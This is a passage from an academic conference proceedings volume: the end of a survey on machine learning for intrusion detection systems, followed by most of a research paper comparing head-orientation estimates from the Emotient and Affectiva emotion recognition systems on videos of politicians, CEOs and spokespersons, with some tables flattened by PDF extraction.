TP Fowlkes-Mallows Index (FMI): It is the FMI = √ (TP+FP)(TP+FN) geometric mean between precision and recall. The value is between 0 and 1, with the highest value being an indicator that there is good similarity between the clusters
Algorithms: Given the recent implementation of algorithms based on Deep learning, which are generating outstanding results in other investigations [40–42], it is desirable that they be implemented in case studies for Intrusion Detection Systems, in order to corroborate performance.
76
6
J. L. Gutierrez-Garcia et al.
Conclusions
Given the large amount of information generated daily and society’s dependence on information technologies, the security of computer resources and information as such is an aspect of vital importance. The different techniques and products related to computer security have played a very important role in recent years, with IDS/IPS being one of the essential elements within any cybersecurity scheme. The application of Machine Learning as a support in the identification and prevention of intrusions has provided favorable and promising results. This survey reveals the need of constantly updated data to be able to give results that respond to current threats, this being one of the challenges facing the academy when proposing alternative techniques for identifying intrusions using ML, making it clear that a close link is required between the academy and global security organizations to access specialized and updated information and training on threats, techniques and challenges to facing modern society.
References 1. Bettina, J., Baudilio, M., Daniel, M., Alajandro, B., Michiel, S.: Challenges to effective EU cybersecurity policy. European Court of Auditors, pp. 1–74 (2019) 2. Gerling, R.: Cyber Attacks on Free Elections. MaxPlanckResearch, pp. 10–15 (2017) 3. World Economic Forum. The Global Risks Report 2020. Insight Report, pp. 1–114 (2020). 978-1-944835-15-6. http://wef.ch/risks2019 4. Ponemon Institute. 2015 Cost of Data Breach Study: Impact of Business Continuity Management (2018). https://www.ibm.com/downloads/cas/AEJYBPWA 5. Katsumi, N.: Global Threat Intelligence Report Note from our CEO. NTT Security (2019) 6. Chi, C., Freeman, D.: Machine Learning and Security. O’Reilly, Sebastopol (2018) 7. Kapersky. Project TajMahal a new sophisticated APT framework. Kapersky (2019). https://securelist.com/project-tajmahal/90240/ 8. CyberEdge Group. Cyberthreat Defense Report. CyberEdge Group (2019). https://cyber-edge.com/ 9. Hanan, H., et al.: A Taxonomy and Survey of Intrusion Detection System Design Techniques, Network Threats and Datasets. ACM (2018). http://arxiv.org/abs/ 1806.03517 10. Mazel, J., Casas, P., Fontugne, R., Fukuda, K., Owezarski, P.: Hunting attacks in the dark: clustering and correlation analysis for unsupervised anomaly detection. Int. J. Netw. Manag. 283–305 (2015). https://doi.org/10.1002/nem.1903 11. Khraisat, A., Gondal, I., Vamplew, P., Kamruzzaman, J.: Survey of intrusion detection systems: techniques, datasets and challenges. Cybersecurity 2(1), 1–22 (2019). https://doi.org/10.1186/s42400-019-0038-7 12. Yao, D., Shu, X., Cheng, L., Stolfo, S.: Anomaly Detection as a Service: Challenges, Advances, and Opportunities. Morgan & Claypool Publishers, San Rafael (2018) 13. KDD. KDD-CUP-99 Task Description (1999). https://kdd.ics.uci.edu/databases/ kddcup99/task.html
Machine Learning and IDS
77
14. Sharafaldin, I., Habibi, A., Ghorbani, A.: Toward generating a new intrusion detection dataset and intrusion traffic characterization. In: ICISSP 2018 - Proceedings of the 4th International Conference on Information Systems Security and Privacy, pp. 108–116 (2018). https://doi.org/10.5220/0006639801080116 15. Ring, M., Wunderlich, S., Scheuring, D., Landes, D., Hotho, A.: A survey of network-based intrusion detection data sets. Comput. Secur. 147–167 (2019). https://arxiv.org/abs/1902.00053. https://doi.org/10.1016/j.cose.2019.06.005 16. Ullah, R., Zhang, X., Kumar, R., Amiri, N., Alazab, M.: An adaptive multi-layer botnet detection technique using machine learning classifiers. Appl. Sci. 9(11), 2375 (2019) 17. Mag´ an-Carri´ on, R., Urda, D., D´ıaz-Cano, I., Dorronsoro, B.: Towards a reliable comparison and evaluation of network intrusion detection systems based on machine learning. Appl. Sci. (2020). https://doi.org/10.3390/app10051775 18. Qiu, S., Liu, Q., Zhou, S., Wu, C.: Review of artificial intelligence adversarial attack and defense technologies. Appl. Sci. (2019). https://doi.org/10.3390/app9050909 19. Carlini, N., et al.: On Evaluating Adversarial Robustness (2019). https://arxiv. org/abs/1902.06705 20. Ullaha, F., Babara, M.: Architectural tactics for big data cybersecurity analytics systems: a review. J. Syst. Softw. 151, 81–118 (2019). https://doi.org/10.1016/j. jss.2019.01.051 21. Chadwick, D., et al.: A cloud-edge based data security architecture for sharing and analysing cyber threat information. Future Gener. Comput. Syst. 102, 710–722 (2020). https://doi.org/10.1016/j.future.2019.06.026 22. Menen, A., Gowtham, R.: An efficient ransomware detection system. Int. J. Recent Technol. Eng. 28–31 (2019) 23. Narayanan, S., Ganesan, S., Joshi, K., Oates, T., Joshi, A., Finin, T.: Cognitive Techniques for Early Detection of Cybersecurity Events (2018). http://arxiv.org/ abs/1808.00116 24. Ravi, S., Jassi, J., Avdhesh, S., Sharma, R.: Data-mining a mechanism against cyber threats: a review. In: 2016 1st International Conference on Innovation and Challenges in Cyber Security, ICICCS 2016, pp. 45–48 (2016). https://doi.org/10. 1109/ICICCS.2016.7542343 25. Daya, A., Salahuddin, M., Limam, N., Boutaba, R.: A graph-based machine learning approach for bot detection. In: 2019 IFIP/IEEE Symposium on Integrated Network and Service Management, IM 2019, pp. 144–152 (2019) 26. Ullah, R., Zhang, X., Kumar, R., Amiri, N., Alazab, M.: An adaptive multi-layer botnet detection technique using machine learning classifiers. Appl. Sci. 9(11), 2375 (2019). https://doi.org/10.3390/app9112375 27. Le, T., Kim, Y., Kim, H.: Network intrusion detection based on novel feature selection model and various recurrent neural networks. Appl. Sci. 9(7), 1392 (2019). https://doi.org/10.3390/app9071392 28. Zhou, Q.: Dimitrios Pezaros School. Evaluation of Machine Learning Classifiers for Zero-Day Intrusion Detection - An Analysis on CIC-AWS-2018 dataset (2019). https://arxiv.org/abs/1905.03685 29. Khraisat, A., Gondal, I., Vamplew, P., Kamruzzaman, J., Alazab, A.: Hybrid intrusion detection system based on the stacking ensemble of C5 decision tree classifier and one class support vector machine. Electronics 9(1), 173 (2020). https://doi. org/10.3390/electronics9010173 30. Liu, W., Ci, L., Liu, L.: A new method of fuzzy support vector machine algorithm for intrusion detection. Appl. Sci. 10(3), 1065 (2020). https://doi.org/10.3390/ app10031065
78
J. L. Gutierrez-Garcia et al.
31. Gao, M., Ma, L., Liu, H., Zhang, Z., Ning, Z., Xu, J.: Malicious network traffic detection based on deep neural networks and association analysis. Sensors 20, 1–14 (2020). https://doi.org/10.3390/s20051452 32. Gonzalez-Cuautle, D., et al.: Synthetic minority oversampling technique for optimizing classification tasks in botnet and intrusion-detection-system datasets. Appl. Sci. 10(3), 794 (2020). https://doi.org/10.3390/app10030794 33. Sarnovsky, M., Paralic, J.: Hierarchical intrusion detection using machine learning and knowledge model. Symmetry 12, 1–14 (2020) 34. Wang, M., Lu, Y., Qin, J.: A dynamic MLP-based DDoS attack detection method using feature selection and feedback. Comput. Secur. 88, 1–14 (2020). https://doi. org/10.1016/j.cose.2019.101645 35. Kumar, S., Rahman, M.: Effects of machine learning approach in flow-based anomaly detection on software-defined networking. Symmetry 12(1), 7 (2019) 36. Hwang, R., Peng, M., Nguyen, V., Chang, Y.: An LSTM-based deep learning approach for classifying malicious traffic at the packet level. Appl. Sci. 9(16), 3414 (2019). https://doi.org/10.3390/app9163414 37. Kwon, H., Kim, Y., Yoon, H., Choi, D.: Random untargeted adversarial example on Deep neural network. Symmetry 10(12), 738 (2018). https://doi.org/10.3390/ sym10120738 38. Anirban, C., Manaar, A., Vishal, D., Anupam, C., Debdeep, M.: Adversarial attacks and defences: a survey. IEEE Access 35365–35381 (2018). https://doi.org/ 10.1109/ACCESS.2018.2836950 39. Ibitoye, O., Abou-Khamis, R., Matrawy, A., Shafi, M.: The Threat of Adversarial Attacks on Machine Learning in Network Security - A Survey (2019). https:// arxiv.org/abs/1911.02621 40. Niyaz, Q., Sun, W., Javaid, A., Alam, M.: A deep learning approach for network intrusion detection system. In: 9th EAI International Conference on Bio-Inspired Information and Communications Technologies, pp. 1–11, May 2016 41. Guo, W., Mu, D., Xu, J., Su, P., Wang, G., Xing, X.: Lemna: explaining deep learning based security applications. In: Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security, Toronto, ON, Canada, 15 October 2018, pp. 364–379 (2018) 42. Nathan, S., Tran, N., Vu, P., Qi, S.: A deep learning approach to network intrusion detection. IEEE Trans. Emerg. Top. Comput. Intell. 2, 41–50 (2018). https://doi. org/10.1109/TETCI.2017.2772792 43. Abbas, S.A., Almhanna, M.S.: Distributed denial of service attacks detection system by machine learning based on dimensionality reduction. J. Phys. Conf. Ser. 1804(1), 012136 (2021). https://doi.org/10.1088/1742-6596/1804/1/012136 44. Gupta, N., Jindal, V., Bedi, P.: LIO-IDS: handling class imbalance using LSTM and improved one-vs-one technique in intrusion detection system. Comput. Netw. 192, 108076 (2021). https://doi.org/10.1016/j.comnet.2021.108076 45. Liu, X., Li, T., Zhang, R., Wu, D., Liu, Y., Yang, Z.: A GAN and Feature SelectionBased Oversampling Technique for Intrusion Detection (2021) 46. Maseer, Z.K., Yusof, R., Bahaman, N., Mostafa, S.A., Foozy, C.F.M.: Benchmarking of machine learning for anomaly based intrusion detection systems in the CICIDS2017 dataset. IEEE Access 9, 22351–22370 (2021). https://doi.org/10. 1109/access.2021.3056614
Head Orientation of Public Speakers: Variation with Emotion, Profession and Age Yatheendra Pravan Kidambi Murali, Carl Vogel, and Khurshid Ahmad(B) Trinity College Dublin, The University of Dublin, Dublin, Ireland {kidambiy,khurshid.ahmad}@tcd.ie, [email protected] Abstract. The orientation of head is known to be a conduit of emotions or in intensifying or in toning down emotion expressed by face. We present a multimodal study of 162 videos comprising speeches of three professionals: politicians, CEOs and their spokespersons. We investigate the relationship of the three Euler angles (yaw, pitch, roll) that characterise the orientation with emotions, using two well known facial emotion expression recognition system. The two systems (Emotient and Affectiva) give similar outputs for the Euler angles. However, the variation of the Euler angles with a given discrete emotion is different for the two systems given the same input. The gender of the person displaying a given emotion plays a key role in distinguishing the output of the two systems: consequently it appears that correlation of the Euler angles is system dependent as well. We have introduced a combined vector which is the sum of the magnitude of the three Euler angles per frame.
Keywords: Emotion recognition communication · Gender
1
· Head orientation · Multi-modal
Introduction
Emotion recognition (ER) is a complex task that is performed usually in noisy conditions. Facial ER systems analyse moving images using a variety of computer vision algorithms, and identify landmarks on the face. ER systems rely largely on statistical machine learning algorithms for recognizing emotions and crucially depend on the availability of training databases. These databases in themselves are quasi-random samples and may have racial/gender/age bias. Facial landmarks help determine head pose. A head pose essentially is characterized by its yaw, pitch, and roll angles - respectively showing up/down, sideways, and backward/forward position. In this paper, we present a case study involving the analysis of 162 semispontaneous videos either given by politicians, chief executive officers of major enterprises, and spokespersons for the politicians. Our data set comprises 12 nationalities, 33 males and 18 females. We have collected 162 videos, 90 from males and 72 videos from females. We have used the speeches of politicians and c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 79–95, 2023. https://doi.org/10.1007/978-3-031-28073-3_6
80
Y. P. K. Murali et al.
CEOs; for spokesperson we have used the answers to questions from journalists. We have used two major ER systems Emotient [3,10] and Affectiva [6,11] that detect emotions and head orientation from videos. We compare the output of the two systems for six ‘discrete’ emotions and for three head orientation and examine the correlation between orientation and emotion evidence and also according to various categories of race, gender, and age. We begin with a brief literature review (Sect. 2) followed by methods used that form the basis of a pipeline of programs that access video data, pre-process the data frame by frame to ensure that there is only one face in the frame, feed this data into emotion recognition systems, and then use tests of statistical significance to see the similarities and differences in the emotional state and head pose of a given subject as processed by the two emotion recognition systems (Sect. 4). Finally, we present a case study based on the videos of politicians, CEOs, and spokespersons, to see how the two recognition systems perform and conclude the paper (Sect. 5). Our key contributions are that we have developed a method to understand the difference in estimation of head orientation in different automatic emotion recognition systems and that we have estimated the relationship between head orientation and the emotions possibly expressed by politicians, CEOs and spokespersons.
2
Motivation and Literature Review
Public engagements of politicians, CEOs, and their spokespersons, primarily involve the use of their first language or second language (which is frequently English). The written text forms the basis on which the politicians and others deliver a performance using language and non-verbal cues - facial expressions, voice modulations, and gestures involving hands, body and the head. These cues are used to emphasize a point, attack the opposition, support a friend, or befriend an undecided. It has been argued that the hand, body, and head gestures may reinforce discrete emotions expressed verbally [8]. However, the gestural information may deliberately be at variance from the text – something like an ‘in-between-the lines’ stratagem – or the emotion felt by the speaker may spontaneously leak (emotion leakage is a term coined some 60 years ago) [5]. Head postures, head bowed/raised or no head movement, are equally well used by a speaker to dominate her/his audience, or show them physical strength, or indicate respect of social hierarchies [12]. In psychological experiments subjects were shown stick figures, based on the facial landmarks of real politicians giving a speech, and asked their opinion about the surrogate politicians’ consciousness and emotional stability. The subjects appear to agree that a pronounced head movement is an indicator of less conscientiousness and a lack of emotional stability [9]. Equally important is the role of body gestures as a whole in emotion expression: Some believe that body gestures merely increase the intensity of emotion expressed through voice or face [4], whilst others believe that body gestures are influenced by emotions felt: Specific body gestures were accompanied when actors pose for a given emotion: moving head downwards accompanies the expression of disgust, whilst head
Head Orientation and Movement Effects
81
backwards move is present during “elated joy” than any other emotion, and head bent sideways may accompany anger [13]. The recognition of emotion directly from the movement of major joints in the body, including the head, has shown accuracy of up to 80% [2]. An analysis [14] of a “3D video database of spontaneous facial expressions in a diverse group of young adults” ([15]: BP4D, comprising 41 subjects expressing 6 different emotions) the authors show that statistically significant means for yaw and roll were close to zero for all the discrete emotions – highest for anger and fear and lowest for sadness. The range of the three angles was significantly larger for all the emotions ranging between 19.4 ◦ C for pitch, 12.1 for yaw and 7.68 for roll; the highest values were for anger, joy, fear followed by surprise and disgust – lowest for sadness. Despite the differences in magnitude and sign, our results are within one standard deviation of the mean with that of Werner et al.’s [14] (see Table 1). Note that the mean for all Euler angles, across the 6 emotions, is small in magnitude for Werner et al. as it is for our calculation. Table 1. Comparison of mean euler angles across emotions computed by [14] on their 41 subjects and the results of our computations on our data base of 162 videos using emotient. Note that the results of affectiva are similar. Results are in degrees Pitch Yaw Roll Joy
Werner et al. 2.8 Our work 2.24
1 0.4 0.13 −0.67
Anger
Werner et al. 2.9 Our work 0.6
2.7 0 0.18 2.47
Fear
Werner et al. 4.1 Our work 1.4
0.3 1.6
Disgust Werner et al. 4.9 Our work 0.05
−0.2 0.7
−0.8 −0.2 2.45 1.15
There has been interesting work being carried out on how to make “humanoid robots express emotions and how humans categorize “facial” and “head” orientation of a robot in terms of discrete emotions felt. In a study of 132 volunteers who saw the robot head placed in 9 different directions of pitch and yaw: Looking up, at gaze level, and down, and looking left, gazing straight ahead, and right [7]. These authors confirm the observation discussed above that the mean value of yaw is zero, that “anger, fear and sadness are associated with looking down, whereas happiness, surprise and disgust are associated with looking upward”, and pitch varies with emotions. These studies are important in that we are not relying on the analysis of facial emotion expression as the “humanoid” robot has no facial muscles. Our literature review suggests the following questions: 1. Is the computation of head orientation independent of the facial emotion recognition systems used?
82
Y. P. K. Murali et al.
This question is important as the output of emotion evidence does vary from system to system [1]. 2. What is the relationship between head orientation/movement and emotions? (a) If there is a relationship, based largely on posed/semi-posed videos, then does this relationship also exists in spontaneous videos? (b) Is the relationship between head orientation and emotions independent of the gender and age of the video protagonist? We discuss the methods and systems used to investigate these questions.
3
Method and System Design
Facial emotion recognition systems compute the probability of the evidence of discrete emotions on a frame-by-frame basis; the systems usually produce the three Euler angles (yaw, pitch, roll). Our videos are of politicians and CEOs giving speeches and their spokespersons giving press conferences. The videos were edited to have only the politician or CEO or spokesperson in one frame the videos were then trimmed to maximize the images in the frame. We then processed the edited videos through both Emotient and Affectiva. The emotion evidence is produced by the two systems and descriptive statistics of all our videos are computed together with the correlation between the outputs of the two systems and how the outputs differ from each other. We compute the variation of the Euler angles with each of the six discrete emotions we study (anger, joy, sadness, surprise, disgust, and fear). The Euler angles are given the same statistical treatment. Typically, in the literature authors talk about small angles and large angles: this is a subjective judgment and we have a fuzzy logic description which uses the notion of fuzzy boundaries between values sets of large angles, medium angles and small angles. A number of programs were used in the computation of head orientation (and emotions) and in carrying out statistical analysis. The pipelines of such programs are shown in Fig. 1.
Fig. 1. Variation of anger in both the systems
Head Orientation and Movement Effects
83
In analyzing head position and movement, we consider the yaw, pitch and roll measurements by both systems for each frame. In some of our analyses we consider these measurements directly. In others we look at derived measurements: change in yaw, pitch and roll from one frame to the next, aggregations of yaw, pitch and roll, and change in aggregations from one frame to the next. There are two sorts of aggregations. The first (see 1) records the head pose angle sum (PAS) for each frame (i) as the sum of the magnitudes of each of the three angular measurements; absolute values are used, so that wide angles in one direction are not erased by wide angles with an opposite sign on a distinct rotation axis. P ASi = |yawi | + |pitchi | + |rolli |
(1)
A related value records the angular velocity of each of yaw, pitch and roll for each system – effectively change in yaw, pitch and roll from one frame to the next. Thus, we also consider the sum of magnitudes of those values. P AS.dfi = |yaw.velocityi | + |pitch.velocityi | + |roll.velocityi |
(2)
The second aggregation understands the values of yaw, pitch and roll at each frame (i) as a vector of those values, YPR (3), where each component is normalized with respect to the minimum and maximum angle among all of the raw values for yaw, pitch and roll. YPRi = yawi , pitchi , rolli
(3)
The measurement addressed is in the change in that vector as 1 minus the cosine similarity between YPR at one frame (i) and its preceding frame (i − 1) – see (4). YPR.dfi = 1 − cos(YPRi , YPRi−1 )
(4)
Cosine similarity, in turn, is defined through the cross product of the normalized vectors, as in (5).1 cos(x, y) =
4
crossprod(x, y) (crossprod(x) ∗ crossprod(y))
(5)
Data and Results
We describe the data set we have used followed by the results organised according to the three questions outlined in the literature review section above. 4.1
The Data Used
The data used are described in Table 2 and Table 3. The two systems will generally produce emotion evidence for frames on the same timestamp. Sometimes, one or both of the frames does not generate any emotion evidence and returns blank values. We have only considered the values where both the systems provided evidence for the same timestamp. 1
In (5), it is understood that arity-one crossproduct is identical to the arity-two crossproduct of a vector with itself.
84
Y. P. K. Murali et al.
Table 2. Data demographic profile: by nationality and gender, the count of individuals, videos and frames within videos recognized by affectiva and emotient Nationality
China
Individuals
Videos
Affectiva frames
Emotient frames
Common frames
F
F
M
Female
Female
Female
14
16
46548
M
3
6
Male 100659
Male
47263
102581
46413
Male 100205
France
1
0
2
0
7995
0
7364
0
7354
0
Germany
1
1
5
5
19249
21353
19267
21529
19217
21228
India
1
7
2
18
8707
91061
8757
103965
8094
77169
Ileland
0
1
0
2
0
19283
0
19228
0
19200
Italy
0
1
0
2
0
8356
0
8370
0
8313
Japan
0
1
0
1
0
20229
0
20213
0
20206
New Zealand
1
0
5
0
25128
0
25750
0
25002
0
Pakistan
0
2
0
6
0
72585
0
59553
0
71887
South Kolea
0
2
0
4
0
35184
0
35237
0
35172
United Kingdom
1
1
5
5
46182
47068
43044
52387
20931
46470
United States
10
11
39
31
239610
187580
248407
186610
238090
182361
Total
18
33
72
90
393419
603358
399852
620616
365101
593139
Table 3. Age ranges and counts of individuals in each occupation, by nationality Nationality
Occupation Age range CEO Politician Spokesperson
4.2
China
49–73
0
6
3
France
49–49
1
0
0
Germany
62–67
0
1
1
India
28–72
3
5
0
Ireland
51–65
0
0
1
Italy
46–46
1
0
0
Japan
73–73
0
1
0
New Zealand
41–41
0
1
0
Pakistan
46–69
0
1
1
South Korea
0
69–71
0
2
United Kingdom 51–57
0
1
1
United States
64–91
5
13
3
Total
28–91
10
31
10
Preliminary Data Profiling
First we consider agreement between Affectiva and Emotient on the basic underlying quantities of yaw, pitch and roll measurements (see plots of each of these in Fig. 2). The Pearson correlation coefficient for yaw is 0.8567581 (p < 2.2e − 16); for pitch, 0.6941681 (p < 2.2e − 16); for roll, 0.8164813 (p < 2.2e − 16).2 This seems to us to provide sufficient evidence to expect that there may be significant agreement between the systems in other measured quantities. 2
Our inspection of histograms for each of the angle measurements suggested that a Pearson correlation would be reasonable. In many other cases, we use non-parametric tests and correlation coefficients.
Head Orientation and Movement Effects
85
Fig. 2. Comparison of the output of euler angles computed by affectiva versus the angles computed by emotient
The scatter plot (Fig. 2) appear to have points distributed around a straight line and we have linearly regressed angles observed (per frame for all our videos) generated by Emotient as a function of angles observed by Affectiva: Y awEmotient = 0.58 ∗ Y awAf f ectiva + 0.72 P itchEmotient = 0.44 ∗ P itchAf f ectiva − 1.36 RollEmotient = 0.54 ∗ RollAf f ectiva + 0.76 This is the basis of our observation that the angles generated by the two systems are in a degree of agreement. We are investigating these relationships further. On the other hand, the systems show little agreement with respect to the assessments made of most probable emotion for each frame (Cohen’s κ = 0.123, p = 0). Table 4 presents the confusion matrix of system classifications. Therefore, and because the data is collected from “in the wild” rather than with ‘gold standard’ labels for each (or any) frame, we analyze the interacting effects with respect to each system’s own judgment of the most likely emotion.
86
Y. P. K. Murali et al.
Table 4. Cross classification of most probable emotion for each frame according to affectiva and emotient. The counts along the diagonal, in bold, indicate agreements. Affectiva Emotient Anger Contempt Disgust Fear Anger Contempt Disgust
4.3
39423
23110
2215
4228
29030
51650 19178
Joy
Sadness Surprise
25222
24863
1025
6074
1780
831
55633 125605 36448
56108
24737
22483
4247
1945
697
2887
1636 30555
798
790
2397
Fear
333
1256
1366
Joy
193
2126
3409
Sadness
9355
1654
17994
Surprise
7824
38090
14831
4024
1529
7759
1119
48438 56010
73547
26236
45552
Results and Discussion
Is the Computation of Head Orientation Independent of the Facial Emotion Recognition Systems Used? There is a similarity in the variation of Euler angles in the videos of all our subjects - see for example the variation in two well known politicians of the last 10 or so years one in united kingdom and other in the USA (Fig. 3). We take the highest evidence of anger (HEA) in both the systems at the same timestamp and then note the variation of evidence around the time.
Fig. 3. Variation of anger intensity around HEA based on video of US politician (left) and UK (right)
We computed the correlation between the results for each of the angles produced by Affectiva and Emotient. The results showed that angles yaw and roll showed highest correlation (87% and 82% respectively, p < 0.05); the lowest correlation was for pitch – 69% (p < 0.05). The two systems show a degree of similarity between the computation of the three Euler angles. Figure 4 shows comparison of the variation in the estimated Euler angles by both systems for the same input video in a frame where the estimated anger intensity values are the highest. The blue trend line describes the variation of Euler angles with respect
Head Orientation and Movement Effects
87
to media time in Emotient, while the orange trend line represents the variation of Euler angles with respect to media time in Affectiva. The blue vertical line represents the highest evidence of anger where both the systems had the highest anger intensity value.
Fig. 4. Distribution of euler angles in both systems near highest evidence of anger (vertical blue line), for the time course of anger: the blue trend line describes the variation of euler angles with respect to media time in emotient, while the orange trend line represents the variation of euler angles with respect to media time in affectiva
We tested this hypothesis by performing a rank correlation test for the time aligned outputs of the both the systems. If one computes the head pose angle sum (PAS) as the sum of absolute values of yaw, pitch and roll, for any timestep, then one has a proxy measure of head orientation. It is possible to consider this measurement according to each of the systems plotted against each other (see Fig. 5): testing the correlation, Spearman’s Rho is 0.62 (p < 2.2e − 16); testing the difference with a directed, paired Wilcox test, one finds significantly greater values for Affectiva than Emotient (V = 4.0994e + 11, p < 2.2e − 16). Considering the YPR vectors and their frame by frame differences for each system, Spearman’s Rho is 0.33 (p < 2.2e − 16). Thus, the values computed are not completely independent, but have significant differences, as well. Table 5 presents the results of analysis of correspondence and difference between Affectiva and Emotient in measuring each of yaw, pitch and roll, for both genders. The results of Spearman correlations each indicate significant positive correlations between the two systems (with coefficients between 0.83 and 0.89 p < 0.001), yet significant difference is also identified through the Kruskal tests (p < 0.001). The statistical tests results are computed using python libraries.
88
Y. P. K. Murali et al.
Fig. 5. Head pose angle sums, computed as the sum of absolute values of yaw, pitch and roll at each timestep, for both systems, Emotient (E) and Affectiva (A), are plotted against each other
Table 6 presents the results of analyzing the correspondence and difference between Affectiva and Emotient in measuring each of yaw, pitch and roll for each of the three occupations in the sample (CEO, Politician, Spokesperson). The systems demonstrate significant positive correlation (with Pearson coefficients between 0.82 and 0.89, p < 0.001) yet also significant differences (through Kruskal tests, p < 0.001). What Is the Relationship Between Head Orientation/Movement and Emotions in Spontaneous Videos? Table 7 represents the results of regression analysis where emotion is considered as a function of Euler angles. This allows us to understand, for example, the effect of pitch degrees (movement of the head on the vertical axis) in relation to a specific emotion (joy, for instance) Table 5. Relationships between affectiva and emotient values for Yaw, Pitch and Roll for Females and Males Yaw Pitch Roll Spearman Kruskal Spearman Kruskal Spearman Kruskal Female Coefficient 0.89 pValue 0.00
180.9 0.00
0.71 0.00
34465 0.00
0.83 0.00
1569.2 0.00
Male
2988.4 0.00
0.67 0.00
122116 0.00
0.83 0.00
6805.7 0.00
Coefficient 0.87 pValue 0.00
Head Orientation and Movement Effects
89
Fig. 6. Change in yaw-pitch-role vectors (see (4)), at each timestep, for both systems, Emotient (E) and Affectiva (A), are plotted against each other
and correlate with the results from the literature. In the table, c marks the estimated intercept and m, the slope of the regression line (as from the standard form in (6)). The extremely low r2 values indicate the poorness of fit to the data of the corresponding linear models. y = c + mx +
(6)
Within the two systems, emotion labels are derived values, based on values for head and facial action movements in posed data sets, where the emotion labels were assigned on the basis of the assumption that actors performed emotions as directed, and were able to perform those emotions authentically.3 Thus, even for the training data, head orientation will have supplied only part of the information used to infer the given label. This is shown in the mean value of head pose angle sums varying with emotion label, for both of the systems, and for the emotion labels supplied by each system. The PAS values within each emotion are greater as measured by Affectiva for Affectiva’s most likely emotion label than as measured by Emotient for Emotient’s most likely emotion label (Wilcox V = 21, p = 0.01563). For both Affectiva (Kruskal-Wallis χ2 = 133523, df = 5, p < 2.2e − 16) and Emotient (Kruskal-Wallis χ2 = 4078, df = 5, p < 2.2e − 16) there are significant differences in the PAS values as a function of the mostprobable emotion (See Table 8).
3
It is reasonable to suppose that performed emotions are exaggerated, even for “method” actors.
90
Y. P. K. Murali et al.
Table 6. Relationships between affectiva and emotient values for Yaw, Pitch and Roll, by occupation Yaw Pitch Roll Spearman Kruskal Spearman Kruskal Spearman Kruskal CEO
Coefficient 0.89 pValue 0.00
4963 0.00
0.54 0.00
23687 0.00
0.86 0.00
127.73 0.00
Politician
Coefficient 0.87 pValue 0.00
1338 0.00
0.67 0.00
92196 0.00
0.83 0.00
6982 0.00
Spokesperson Coefficient 0.89 pValue 0.00
7013 0.00
0.78 0.00
34270 0.00
0.82 0.00
3012 0.00
Table 7. Regression analysis: “Emotion” evidence as a function of euler angles Emotient Panel
Yaw
Anger c 0.1303 m 0.0004 r-squared 0.000 Joy
Affectiva Pitch
Roll
0.1339 0.1248 −0.0033 0.0073 0.007 0.026
c 0.2273 0.2176 m −0.0009 0.0090 r-squared 0.001 0.0220
Yaw
Pitch
Roll
5.8073 5.7087 5.7847 0.0237 0.0133 0.1330 0.0000 0.0000 0.002
0.2362 2.6300 2.1704 2.5911 −0.0119 0.0364 0.0757 −0.0587 0.029 0.001 0.002 0.001
Table 8. Mean of head pose angle sum for each system, by most likely emotion, according to each label source System
Label Source Anger Contempt Disgust Fear
Joy
Sadness Surprise
Affectiva Affectiva
33.510 29.463
23.165
18.127 22.441 21.291
21.807
Affectiva Emotient
26.332 28.211
24.100
21.306 25.068 25.283
24.460
Emotient Affectiva
18.327 17.099
16.341
14.126 15.006 14.508
15.554
Emotient Emotient
16.363 17.778
16.482
15.127 15.814 16.766
16.463
Similarly, in relation to change in each angle (yaw, pitch and roll) from one timestep to the next, one may examine the total magnitude of change (the sum of absolute values in change at each timestep – recall (2)) across the three angles as measured by each of the systems (See Table 9). For both Affectiva (Kruskal-Wallis χ2 = 1779.9, df = 6, p < 2.2e − 16) and Emotient (KruskalWallis χ2 = 5035.5, df = 6, p < 2.2e − 16) there are significant differences in this aggregated measure of angular movement depending on the emotion category determined most likely by the corresponding system.
Head Orientation and Movement Effects
91
Table 9. Mean of head pose angle change magnitudes (At each timestep, the sum of absolute values of change in Yaw, Pitch and Roll; therefore, the mean of that aggregate angle change magnitude) in relation to each emotion label deemed most probable for each system System
Anger Contempt Disgust Fear
Joy
Sadness Surprise
Affectiva 0.098
0.103
0.087
0.082 0.084 0.092
0.084
Emotient 0.048
0.043
0.045
0.042 0.043 0.048
0.052
Table 10 indicates the mean values of change in position between successive frames (the complement of cosine-similarity as in (4)) for the most probable emotion according to each system. Figure 6 depicts the change in YPR values derived from Emotient measurements plotted against the change in YPR values derived from Affectiva measurements. For both Affectiva (Kruskal-Wallis χ2 = 3473.3, df = 6, p < 2.2e − 16) and Emotient (Kruskal-Wallis χ2 = 6223.8, df = 6, p < 2.2e−16), there are significant differences in the YPR.df values according to the most probable emotion selected by each system. Table 10. Means of change in YPR vectors over successive frames, according to the most probable emotion for each system System
Anger
Contempt Disgust Fear
Joy
Sadness Surprise
Affectiva 0.00043 0.00042
0.00023 0.00017 0.00021 0.00021 0.00019
Emotient 0.00042 0.00039
0.00032 0.00028 0.00032 0.00046 0.00050
Thus, there is evidence that both head pose and motion vary with the most likely emotion label accorded to each timestep, for both of the systems considered, even though the systems differ with respect to which emotion labels are implicated. Is the Relationship Between Head Orientation and Emotions Independent of the Gender and Age of the Videoed Person? There appear to be significant interactions among most likely emotion label, gender and age for each of the systems on the corresponding posed angle sum (PAS) values. Using the PAS measure as a response value and a linear model that predicts this on the basis of assigned emotion, gender and age, for Emotient, the corresponding linear model has an adjusted R-squared value of 0.1151 (F-statistic: 4616 on 27 and 958212 DF, p < 2.2e − 16) and all interactions are significant (p < 0.001). The matched linear model that predicts PAS for Affectiva assuming interactions of Affectiva-assigned emotion labels, gender and age has an adjusted R-squared value of 0.1907 (F-statistic: 8366 on 27 and 958212 DF, p < 2.2e−16) and reveals all interactions to be significant (p < 0.001). From the adjusted R-squared values, it seems safe to conclude that both models omit important factors that
92
Y. P. K. Murali et al.
